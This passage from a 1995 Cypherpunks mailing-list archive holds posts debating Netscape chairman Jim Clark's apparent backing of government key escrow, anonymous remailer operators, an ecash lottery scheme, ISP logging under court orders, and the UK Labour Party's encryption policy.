> in everyone's interest to keep hands off but if one starts to regulate
> then it is in others interests to regulate. The general soulution to
> prisoners dilema games is to form some type of alliance. It is not
> possible to form alliances in classical prisoners dilemas since they
> are restricted to a single dilema at a time. Givernments are involved
> with multiple dilemas and hence have multiple agreements. The main reason to
> keeo a treaty is that the credibility of government depends on keeping 
> treaties. Thus a treaty can solve a prisoners dilema problem since 
> the gain from breaking one treaty is more than offset by the potential loss
> through other sides abrogating other treaties.
> 
> 
> I suspect that the role of an Internet Czar would be mainly ensuring that 
> fat Internet pipes arrived throughout the third world. George Sorros has
> been very active in this area, he paid for much of the infrastructure
> development into Eastern Europe. If we could persuade Bill Gates that his 
> mission in life was to cable Africa to the Internet somehow we might have the
> whole planet online before 2000.
> 
> I would not be too worried about WTO banning crypto or attempting looney
> tune ideas like insisting on OSI protocols. The UN generally does some very 
> worthwhile work in allocating radio frequencies and such like and has done so 
> for many years without problems. They allocate areas of the clarke belt for 
> satelites and do all sorts of mundane tasks.
> 
> 
> One of the odd things about power is that the larger the scale the more mundane 
> the decisions. At the local level councillors decide to build or close schools 
> and hospitals. At the global level negotiations are held on the size of holes in 
> fishing nets and the exact specifications of ball bearings.
> 
> If people want to see the Federal government weakened in power the only way to 
> do so is to make it ceed power both upwards and downwards. A national speed 
> limit may be a bad idea (I personally think what was wrong was 55mph) but 
> national standard roadsigns is a good idea. International standard roadsigns are 
> a better idea still. 
> 
	<attila sez>  amen for international road signs --go metric! join 
    the living!  go 24 hour clocks and not be lost in the rest of the world!

        and, while we're at it, let's use universal time! yeah, right! 
    this one I can see.

> 
> 		Phill.
> 





From tcmay at got.net  Thu Nov 30 13:49:35 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 05:49:35 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID: <ace3561b10021004241f@[205.199.118.202]>


At 8:08 PM 11/30/95, hallam at w3.org wrote:
>Folks, lay of Netscape on this one. _EVERYONE_ is doing Terissa for the feds to
>use themselves. There are reporting requirements (FOI) which most people
>on this
>list seem to enjoy which make the privacy issue moot. There are other
>people who do
>not want to have non escrowed data flowing over their internal nets, nuclear
>installations etc.

Ah, but Jim Clark's comments were as follows, and indicate that the issue
is the _government_ reading _private Net communications_:

---section of interview or speech with/by Jim Clark of Netscape, emphasis
added by me---


To secure Net communications, the government will need to have access to
private data exchanges
                                  ^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
using what is known as a key escrow security system, said Clark. He added
that an invincible security system for the Net is possible, but such
asystem won't be built unless the government

^^^^^^^^^^
has a stake in it. "That's where key escrow comes in," said Clark.

Key escrow is a controversial security system advocated by the Clinton
administration that gives the government access to private Net
communications. It uses public key cryptography, a system
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
in which messages are coded and decoded using a set of private and public
keys. In key escrow, the private key is held by both the individual or
group and the government. The government can
                                                        ^^^^^^^^^^^^^^^^^^
use the key ostensibly to read messages for intelligence and national
security reasons.

---end of section---

This is not then just an issue of supporting voluntary key escrow for
corporations, nuclear installations, germ warfare labs, and the Church of
Scientology, this is GAK, pure and simple.

Phill, very few of us are opposed to the voluntary use of escrow schemes.
I, myself, would be interested in a robust system wherein my lawyer, for
example, could have a "duplicate key" to some of my files. We have
discussed this issue many times. Truly voluntary key escrow means that the
criteria described above by Jim Clark, that government access to private
communications is "where key escrow comes in," would be impossible to
achieve. Clearly, the type of key escrow being supported by Jim Clark,
Dorothy Denning, David Sternlight, Stuart Baker, and others is hardly
voluntary.

>Key escrow is not bad in itself. It is the idea that individuals be forced to
>use it for private conversations that is the bad idea.

Carefully read Jim Clark's direct quotes and the views attributed to him in
the article.

>
>If people want to argue "make the technology avaliable and it will be
>abused" then
>let them. Just remember that we normally argue the other side of the case.

No, the issue is that the proposal is explicitly GAK, not a voluntary
system. Details of deployment are of course murky, and this firestorm may
help to kill it for now, but the issue is clearly that Jim Clark is saying
the government needs to be able to read private communications and that key
escrow is needed. Given that he is the Chairman of Netscape, this is
worrisome.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From raph at c2.org  Thu Nov 30 13:50:28 1995
From: raph at c2.org (Raph Levien)
Date: Fri, 1 Dec 1995 05:50:28 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199511302041.MAA19507@infinity.c2.org>


I called Netscape public relations. Here's what I found out:

1. Netscape PR does not keep transcripts, etc., of Jim Clark's
speeches.

2. You can order a tape of the speech from Conference Copy for
$12. Their phone number is +1 (717) 775 0580. Be advised, though, that
it will take three weeks.

If we are lucky, an amateur recording technician (trained by the
Grateful Dead, perhaps?) will come out of the woodwork before
then. Failing that, maybe a Fair Witness was there and is willing to
speak.

Raph






From anonymous-remailer at shell.portal.com  Thu Nov 30 14:03:22 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 06:03:22 +0800
Subject: List of reliable remailers
In-Reply-To: <199511301739.JAA13160@jobe.shell.portal.com>
Message-ID: <199511302053.MAA27611@jobe.shell.portal.com>


Apologies for following up on my own post, but I did some digging and
found out what I needed to know.

> > Groups of remailers sharing a machine or operator:
> > (robo syrinx c2)
> > (flame hacktic replay)
> > (alumni portal)
> 
> Anything more specific on the above info? 

It turns out that this information is only intended for automatic
chain selection, not as a capsule history of the remailers. But see
below.

>   robo, syrinx, c2 all running on c2.org
>   alumni, portal run by Hal Finney
>   hacktic, replay run on xs4all / by Alex de Joode?
> 
> ok so far, but flame is xs4all/de Joode as well?

In fact, yes, at least until Tomaz gets good enough Net access in
Slovenia to support a remailer.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From DR940788 at caper1.uccb.ns.ca  Thu Nov 30 14:03:45 1995
From: DR940788 at caper1.uccb.ns.ca (BlackHeart)
Date: Fri, 1 Dec 1995 06:03:45 +0800
Subject: query...
Message-ID: <199511301707073141.DR940788@caper1.uccb.ns.ca>


Reply to: DR940788 at caper1.uccb.ns.ca

   I am currently putting together an e-zine covering computer security
issues, non-mainstream music, and basically anything else people want to
write about.  This is an open query for submissions on any kind. Here are
good examples of what I will consider putting into the zine :

---------
Good chance of getting in:
a. interviews, quotes, etc. from "net personalities", writers, band
members, people with interesting computer-related jobs/hobbies/etc.
b. people involved in the field of computer security on either side of the
wall, hackers, phreaks, system admins, police, etc. and their tales
c. reviews of independant, or non-mainstream software, movies, music, etc.
d. any kind of new digital tech. that is interesting and unique, a
description and review
e. basically anything else that is related to the information age, digital,
cyber (even though i hate the word), 'net related, etc.

---------
NO chance of getting in:
a. political views/essays which are not a concern of the computer and/or
net community
b. fiction of ANY sort (sci-fi, cyberpunk, etc, etc.)
c. anything else not related to alternative or "tech" field (ex - reviews
of mainstream albums, movies, etc., also articles on things such as the
environment and gay rights will be turned away, simply because this is not
what the magazine is aiming for)

---------
If you have an album, tape, CD, software, device, etc. you want reviewed,
send it along to :

Terminal Obsession
P.O. Box 831
Sydney, Nova Scotia
CANADA
B1P 6T7


If you are interested in subscribing to the completed 'zine, wait until
you see an announcement, as the zine is not complete as of yet, and may
not be for a short while, so i have nothing to send you yet!





From iagoldbe at calum.csclub.uwaterloo.ca  Thu Nov 30 14:13:29 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 1 Dec 1995 06:13:29 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <49l62m$4dl@calum.csclub.uwaterloo.ca>


In article <199511300621.WAA26406 at netcom14.netcom.com>,
Bill Frantz <frantz at netcom.com> wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonimity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.
>
But with complete anonymity, no player knows who else is playing, let
alone who won.  So if you were going to pay off yourself, you may as well
just pay off no one.

The idea behind my proposal was that any participant can determine if he has
won.  The winning number (a hash of which was published beforehand, as in
a "bit commitment" scheme) is announced.  Anyone who picked a number
that, say, matched in the last digit, wins $2.  If you matched the
last two digits, you win $10, etc.  The house (without sacrificing
reputation) can't arrange who the big payoffs will go to, nor can it
(as I think Tim suggested) give out lots of small prizes and no big ones.

   - Ian





From vinnie at webstuff.apple.com  Thu Nov 30 14:26:24 1995
From: vinnie at webstuff.apple.com (Vinnie Moscaritolo)
Date: Fri, 1 Dec 1995 06:26:24 +0800
Subject: Netscape gives in to key escrow
Message-ID: <v02110100ace3a9062ab4@[17.203.21.75]>


GAK or is it Gack!!!

You know, one possible solution lies in the direction of Apple's CyberDog.
It is based on OpenDoc and should be portable to windoze, I hate to say Rah
told you so but...

Even with all the ITAR silliness, even if on the contigincy that Apple
can't provide a SSL or whatever in thier HTML part, YOU can always write
your own HTML part, (its just not that complicated) in the Cyberdog
environment and override the Apple CyberDog HTML part.

This looks like a great opertunity for some Cypherpunks to write code, and
code that people DO care about.. a CypherPunk CyberDog part to replace the
Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)


(lawyer types beware: This is definitely my opinion and you and I
both know Apple is old enough to speak for itself.)

-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"

http://webstuff.apple.com/~vinnie/

Fingerprint =  4F A3 29 81 50 E4 04 F2  78 25 01 87 6E A2 14 6A
--------------







From jim at acm.org  Thu Nov 30 14:31:23 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 1 Dec 1995 06:31:23 +0800
Subject: Getting a copy of the Jim Clark speech
In-Reply-To: <199511302041.MAA19507@infinity.c2.org>
Message-ID: <199511302124.NAA26868@mycroft.rand.org>



> Raph Levien <raph at c2.org> writes:
> I called Netscape public relations. Here's what I found out:

> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
> 2. You can order a tape of the speech from Conference Copy for...

Good initiative, but we needn't wait for 6 weeks to get a copy of it.
All that needs to happen is for Jim Clark to explain what he meant, if
it's different from what was reported.  No need for all the to-ing and
fro-ing.

Perhaps what he meant was simply reiterating the announcement of October
when they said they'd support the TESSERA crypto API.  If it's worse than
this, he should explain what's going on.  If not, October was the time to
get excited rather than now.

Waiting with bated breath...

	Jim Gillogly
	Highday, 10 Foreyule S.R. 1995, 21:24





From aleph1 at dfw.net  Thu Nov 30 15:06:02 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 07:06:02 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <v02110100ace3a9062ab4@[17.203.21.75]>
Message-ID: <Pine.SUN.3.91.951130162044.14431A-100000@dfw.net>


On Thu, 30 Nov 1995, Vinnie Moscaritolo wrote:

> Even with all the ITAR silliness, even if on the contigincy that Apple
> can't provide a SSL or whatever in thier HTML part, YOU can always write
> your own HTML part, (its just not that complicated) in the Cyberdog
> environment and override the Apple CyberDog HTML part.
> 
> This looks like a great opertunity for some Cypherpunks to write code, and
> code that people DO care about.. a CypherPunk CyberDog part to replace the
> Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Well if we gonna go that way just use HotJava and create your own 
protocol and content handlers. They are d/l dynamicly. Just as an example.
Write a pop3 protoclos handlers, they use the URL 
pop3://mail.host.com/loginname to get your mail. Oh whats that? Someone
sent you a application/pgp message well guess they pgp content handler will
have to take care of that.

Its really a shame that Sun hasent released HotJava with the JDK it could
give netscape a sun for its money.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From tcmay at got.net  Thu Nov 30 15:10:39 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:10:39 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID: <ace3709501021004c775@[205.199.118.202]>


At 10:09 PM 11/30/95, Timothy C. May wrote:

>To secure Net communications, the government will need to have access to
>private data exchanges
>                                  ^^^^^^^^^^
>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Sorry about the misaligned text and emphasis marks--it looked OK when I was
composing the message, but some hidden characters must've been present when
I cut-and-pasted the Clark text.

I think you all get the gist, though.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Thu Nov 30 15:24:18 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:24:18 +0800
Subject: CyberDog?
Message-ID: <ace371a202021004069a@[205.199.118.202]>


At 9:16 PM 11/30/95, Vinnie Moscaritolo wrote:

>You know, one possible solution lies in the direction of Apple's CyberDog.
>It is based on OpenDoc and should be portable to windoze, I hate to say Rah
>told you so but...
>
>Even with all the ITAR silliness, even if on the contigincy that Apple
>can't provide a SSL or whatever in thier HTML part, YOU can always write
>your own HTML part, (its just not that complicated) in the Cyberdog
>environment and override the Apple CyberDog HTML part.
>
>This looks like a great opertunity for some Cypherpunks to write code, and
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>code that people DO care about.. a CypherPunk CyberDog part to replace the
>Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Go for it, Vinnie! Let us know how it works out. Being at Apple, I presume,
you're in a position to do what you suggest.

The problem of course is that many, many pieces of code "need" to be
written: several projects mentioned on this list frequently could use more
coders. Integrating the casual work of volunteers is usually hard to do.

If the idea is really a good one, and will result in an interesting
product, then probably the best approach is for someone to do more than
just volunteer some free time: he should set out to build a product he can
sell or at least get some recognition for. (A la Eudora, Stuffit, Red
Ryder, etc.)

I'm a Mac user, but am taking a wait-and-see approach to this "CyberDog"
(dumb name!) thing. If it works out, great. But until OpenDoc (and the
alphabet soup of object standards like Ole, Bento, DOE, SOM, etc.) appears
in real products and demonstrates usefulness, I don't see a rush of folks
moving from Windows and Unix platforms to the Mac to develop it.

If CyberDog is really a decent Web browser--and I've heard some good things
about it, admittedly from Macintosh partisans--then many of us will
probably use it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From corey at netscape.com  Thu Nov 30 15:33:08 1995
From: corey at netscape.com (Corey Bridges)
Date: Fri, 1 Dec 1995 07:33:08 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511302245.OAA00266@netscape.com>


Speaking for me and not Netscape:

I am not in favor of governmental key escrow. Getting that news yesterday
made for the worst day I've had in a while. 

However, I think that history will look back on this period and snicker.
"They thought they could pull off key escrow? Yeah, right." I think that
things are going to get pretty ugly over the next few years, but ultimately,
it's too late. The genie's out of the bottle. 

I'm not going to say "Don't give up on Netscape." Do what you feel you should.

*I'm* not giving up on Netscape, however. We haven't adopted this as a
company position, and besides, I think I can do more good on the inside than
on the outside. 

In a related matter, there was talk a couple days back about creating a PGP
plug-in for Netscape Navigator. I've actually been thinking about that for a
couple months, but I make a much better writer than a programmer. (And if
you've ever read any of my books, keep your jokes to yourself.) Anyway, if
people out there are interested in doing the real work on such a product,
I'd be more than willing to help with the documentation, UI, and other
things where I have a modicum of talent. I'd also put a copy of it on my
home page and hype it internally.

In an unofficial capacity, natch.

Corey Bridges
Security Documentation Manager
Netscape Communications Corporation
415-528-2978






From KJC at cityscape.co.uk  Thu Nov 30 15:34:38 1995
From: KJC at cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 07:34:38 +0800
Subject: GAKzilla & British MPs
Message-ID: <199511302239.WAA16631@ns.cityscape.co.uk>


>
>
>On Thu, 30 Nov 1995, KJC wrote:
>
>> for ages - I give up!.- BTW- after 'Britland' MPs posted hear a while back
>
>Interesting, that must have been during one of my sanity vacations from the 
>list. Do you remember approx. when or maybe what their names were?
>Might make it easier to hunt it down in the archives.
>Thanks.
>
>You know it's really strange, the only people around here I've found 
>interested in crypto and aware of sci.crypt and this list were government 
>spooks. I even sold my 1st edition Applied Crypto to one.
>Friendly people, but totally discouraging.
>
>> I thought _maybe_ we'd hear more.Will the last one to leave Grate Britain
>> please switch out the lights!
>> kc
>At least you have better weather. 
>
>
I think it was around March '95. Adam Back(?) cross-posted an email
from sci.crypt (written by Chris Smith and concerning Cambridge(U.K.)
MP Anne Campbell).At some point Campbell posted to the list herself(?)
Sorry,I'm not very clear on this but for some reason I always thought
she wasn't the only MP involved. Yadayadayada... they're a bit like London buses-
nothing for hours then 3 or 4 arrive at the same time...
I've posted this to the list 'cause maybe someone can update the story...
I'd _still_ like to know if there has been any discussion(by MPs) since then 
Sorry about the bandwidth 
kc
p.s. Weather better now its been sold to the French.






From dl at hplyot.obspm.fr  Thu Nov 30 15:43:30 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 1 Dec 1995 07:43:30 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <9511302253.AA04389@hplyot.obspm.fr>


'small' questions about inet gambling

+ How do you complain that you didn't got your win without revealing
your ID ?
+ Alternatively, How do you prevent false complains or nasty
concurrent trying to trash gambling co reputation ?

regards
ps: it would be easier that the game is legal so ppl can play without
being hidden... In my current casino, most people do complain when
there is a problem, and I think that those who don't aren't because
its monopoly money or just they aren't paying much attention...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi





From tcmay at got.net  Thu Nov 30 16:10:50 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 08:10:50 +0800
Subject: Netscape's Delicate Balancing Act
Message-ID: <ace375f6030210040b22@[205.199.118.202]>



The market valuation of Netscape Communications is not specifically a
Cypherpunks topic, though many of us interested in it, and/or use Netscape.

But there are some issues about Netscape's future product plans which may
affect market valuation, and which also could hinge on PR issues like Jim
Clark's apparent support for mandatory key escrow.

To wit, Netscape is currently valued at $5 billion or so, despite having
essentially no revenues or profits (sure, it has a little of each, but not
much). This is more than the market capitalization of many sizable,
respected companies. Companies like General Dynamics, Apple Computer, CBS
(which was just sold to Westinghouse for $5B). Granted, Netscape investors
are betting on the come. (And contrary to what someone said, investors in
companies like Netscape are not mostly interested in profits. Rather, they
are interested in selling at a higher price, for whatever reason. This is
also known as the "greater fool" theory: that no matter how high the price
of a stock, there is some greater fool who will buy it a higher price. Of
course, the corrolary to the greater fool theory is that there is usually a
greatest fool.)

So, can Netscape keep a $5 billion valuation? (And more to the point, can
it double from where it is now, say, and sustain a $10 B valuation? I am
skeptical, personally, but I've been wrong before.)

What Netscape has to offer is based on a *public* standard, the Web and all
the various pieces that so many companies are supporting. Netscape's
_server_ market--which is said to be where the revenues are mostly coming
from--is likely to face heavy competition. As is the browser, of course.
(Spyglass Mosaic, Ravi's company, HotJava, CyberDog, MacWeb, and a bunch of
others).

Scenario #1: Netscape sticks to an open standard. Hard to see what keeps
the valuation at $5 B with so many free browsers, free servers, low-cost
servers, etc.

(From the browsing side, "brand loyalty" is probably minimal: I've used
several browsers, and currently use Netscape 1.1N for _some_ of my Web
needs. I'll switch "on a dime" to another browser if it offers features I
like. Others I have talked to feel the same way. I think "loyalty" to a
particular browser is close to nil. Much less than loyalty to a text
editor, for example.)

Scenario #2: Realizing this, Netscape seeks to "differentiate itself" by
proprietary technology.

"'Nuff said."

I can't see any means of "proprieterizing" the Web that Netscape could hang
on to. Any good ideas will be quickly copied or reverse-engineered by other
companies and groups.

Unlike a chip company, with various and complicated secrets tied up in
internal chip design data bases and in billion-dollar fabrication plants,
what could a browser or server really keep secret? Unlike a company like
Adobe, with various programs whose functionality can mostly be protected
from copying by use of copyright laws, a Web browser that operates on
public standard files in standard ways will be hard to protect.
(Ironically, Netscape's valuation is significantly higher than Adobe's, and
Adobe had something like $700 million in yearly sales and $100+ million in
profits.)

So, it is my thesis that "brand loyalty" to Netscape is ephemeral, that
users will flock to the Next Whizzy Thing faster than you can say "price
collapse."

The connection with crypto and key escrow is that any bad publicity, any
hint that Netscape is signing-on to be an agent for Big Brother, could
hasten this conversion.

While I would never, ever suggest to anyone that the sticker idea I devised
a few years ago--"Big Brother Inside"--be applied here, I can imagine
others will.

Netscape is in a very delicate balancing act. Jim Clark may turn out to be
the Karl Wallenda of the Web (with no Net to catch him).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From nobody at REPLAY.COM  Thu Nov 30 16:13:13 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 08:13:13 +0800
Subject: nonetest
Message-ID: <199511302254.XAA09438@utopia.hacktic.nl>


12890 87221 56907 00458 94225
40838 75693 98239 87802 85834
98347 49857 21349 12038 14896
09343 87458 98589 32759 74545








From bdavis at thepoint.net  Thu Nov 30 16:14:48 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Fri, 1 Dec 1995 08:14:48 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511301946.LAA12448@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.951201171205.5743A-100000@mercury.thepoint.net>


On Thu, 30 Nov 1995, sameer wrote:

> > 
> > What about a court order to (a) start comprehensive logging, and (b) not
> > tell anyone under penalty of ______ .

I am unaware of any authority for such an order.
> 
> 	Aren't court orders part of the public record? I don't quite

Yes, but court orders can be sealed pending further order of the court.

> know how this would work. I don't think they can keep me from telling
> people that I've started comprehensive logging, or at least keep it
> from being founnd out. (Legally, that is. I'm sure they could always
> use an approach like threatening to audit me every year, threatening
> my family, etc.)
> 
> -- 
> sameer						Voice:   510-601-9777
> 

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!






From JonathanZ at consensus.com  Thu Nov 30 16:20:16 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Fri, 1 Dec 1995 08:20:16 +0800
Subject: "Got a subpoena?"
Message-ID: <v02120d03ace3efad2ed8@[157.22.240.13]>


At 11:46 AM 11/30/95, sameer wrote:
>>
>> What about a court order to (a) start comprehensive logging, and (b) not
>> tell anyone under penalty of ______ .
>
>        Aren't court orders part of the public record? I don't quite
>know how this would work. I don't think they can keep me from telling
>people that I've started comprehensive logging, or at least keep it
>from being founnd out. (Legally, that is. I'm sure they could always
>use an approach like threatening to audit me every year, threatening
>my family, etc.)

In fact, most forms of recording need willing participation by at least one
party. Wiretaps are the main method of recording information which doesn't
involve willing participation of one of those communicating. Since there
are no laws regarding participation of service providers assisting the
government at gathering information, there is a great deal of leeway
legally.

If they actually pass a law (as in Penn) regarding ISP obligations it'll
probably be fought a bit, but does then put more stress on the situation.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ at consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..







From rmartin at aw.sgi.com  Thu Nov 30 16:31:39 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 1 Dec 1995 08:31:39 +0800
Subject: UK Labour Party policy on encryption
Message-ID: <9511301846.ZM3820@glacius.alias.com>



-----BEGIN PGP SIGNED MESSAGE-----

[see http://www.poptel.org.uk/labour-party/policy/info-highway/content.html
for full text]

> It is important that privacy is rigorously protected over the
> new networks, for both personal and commercial reasons. We do
> not accept the "clipper chip" argument developed in the United
> States for the authorities to be able to swoop down on any
> encrypted message at will and unscramble it.
>
> The only power we would wish to give to the authorities, in
> order to pursue a defined legitimate anti-criminal purpose,
> would be to enable decryption to be demanded under judicial
> warrant (in the same way that a warrant is required in order
> to search someone's home).
>
> Attempts to control the use of encryption technology are wrong
> in principle, unworkable in practice, and damaging to the
> long-term economic value of the information networks. There is
> no fundamental difference between an encrypted file and a
> locked safe. A safe may be effectively impregnable in that the
> effort taken to open it would destroy the contents. An
> encryption algorithm, similarly, may be effectively
> unbreakable.

Notes.

I've taken this entirely out of context*; cpunks will be glad to
find that the same document manages to hit at least two of the
horsemen of the infocalypse. A few paragraphs earlier is the
standard "must protect women, children, and ethnic minorities"
(paraphrased) argument.

Labour seems likely to form the next government. And even if they
don't, their stated policy might be a good thing to take to the
Tories, saying something along the lines of, "Labour has a clue,
where's yours?" [Note that I was unable to find the Tory point
of view.]

I found this stuff from Anne Campbell MP's home page.

http://www.worldserver.pipex.com/home/anne.campbell

* for brevity's sake.

richard

Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML5COB1gtCYLvIJ1AQFZ1wP+Ox2fbOKsEbtl06GZugpB8ecHl5cGYHSQ
7sBro0QFr2v4KZOV6X435LXmAqSV8ML+BmVsT/1bnfUzsxeIQErhC0q1kQeA+hAX
h21SYfW6hN3h2L9aOtLr/1FDZkKAcXGDNFkvq/weKQdxCbtTw0Nl1ZQym3oaYdhT
MrjKi85fU44=
=CeYH
-----END PGP SIGNATURE-----





From anonymous-remailer at shell.portal.com  Thu Nov 30 16:39:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 08:39:10 +0800
Subject: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <199511302342.PAA12808@jobe.shell.portal.com>


On Tue, 28 Nov 1995, Robert Hettinga wrote:

> God help us all.
> 
> I've been invited to the CyberDog Coding Retreat next week at Apple
> Computer in Cupertino. Getting flown out there is cool. Hanging with the
> more clueful Mac Internet types and getting to kibbitz and watch (I like to
> watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
> subsisting on Dew and Pizza is really way cool. Even getting some
> mac.cypherpunks in the door to code cypto parts is extremely cool. But...

Mountain Dew and Pizza??  Ohh, waita minutae ... this is California.

That means it's probably smoked salmon, with avocado and mayonnaise
pizza.  Yum.  Seriously though ... I'm green with envy.  

I'd love to attend something like this, but logistics would be a
nightmare.  First, I'd have to get clearance from the US government
for that.  And I think I'm on their "undesirable" list, and would need
to get some type of waiver to clear immigration.  Problems, eh??

I tried to call the Consul-General this afternoon, actually to inquire
about that and got put on perpetual hold and forced to listen to some
long recording.  Then I was told that if I wanted any information at
all, I should call a 1-900 number.

A 1-900 number??  Too rich for my blood.

I guess that Foggy Bottom, really is worried about their budget
issues, aren't they?  I guess they really want me to use my quarter
for pretty much everything.

> They've asked me to give a "talk". All by myself. In an auditorium. With an
> audience, I mean. With publicity. I feel like Hoffman in Rain Man...
> V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
> here...

Oh, I hate large groups, unless I have prepared text.

> Sooo. I've been told I can have friends in the audience. That's cool. As
> many friends as I want. That's even cooler. I can even have reinforcements
> up on the rostrum. That's extremely cool.

Cool.  About reinforcements on the rostrum.  

I know, I really wouldn't inspire any confidence in the audience, at all. 
I'd probably go off into some strange side track on the nuances of
something completely irrelevant and loose the entire audience while
talking.  I'm really one of those people that doesn't always have facts,
and figures, and symbols readily at hand.  It's a cognitive thing. 

Sort of like a database inquiry.

Alternatively, if I do focus on an issue.  YIKES!!  My Aunt Danielle
always warned me about my tendancy to use nuclear weapons when simple
artillery would suffice.  I tend to come on a "bit" heavy at times, unless
I actively self-censor.  It really is a constant battle on that front. 

> So, while I work on the "reinforcements up on the rostrum" part, *please*
> come and help me explain this stuff to the rest of the Apple community.

I'm really not sure I'd necessarily want to break "bad news" to
people, reinforcements or not.  I saw this yesterday, at a
presentation that I was at.  It was horrible, and I wasn't even
presenting.  I was in the audience -- an invited guest.  

I sorta kinda pissed on someone's campfire, and after that no-one
wanted to talk to me.  Shoot if looks could kill ...

I'd be worried about reputations and popularity, and what this all
means "long-term", beyond the time-line of the presentation.

I know that explaining some of this might severely limit future
opportunities.  I think I read that somewhere recently ... that
"consultants with blood on their hatchets" usually don't get very far. 

But it's your talk, I guess.  Just my $.02.

> Cryptoanarchy. Right here in Cupertino, folks.
> 
> See you there...



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From aleph1 at dfw.net  Thu Nov 30 17:11:10 1995
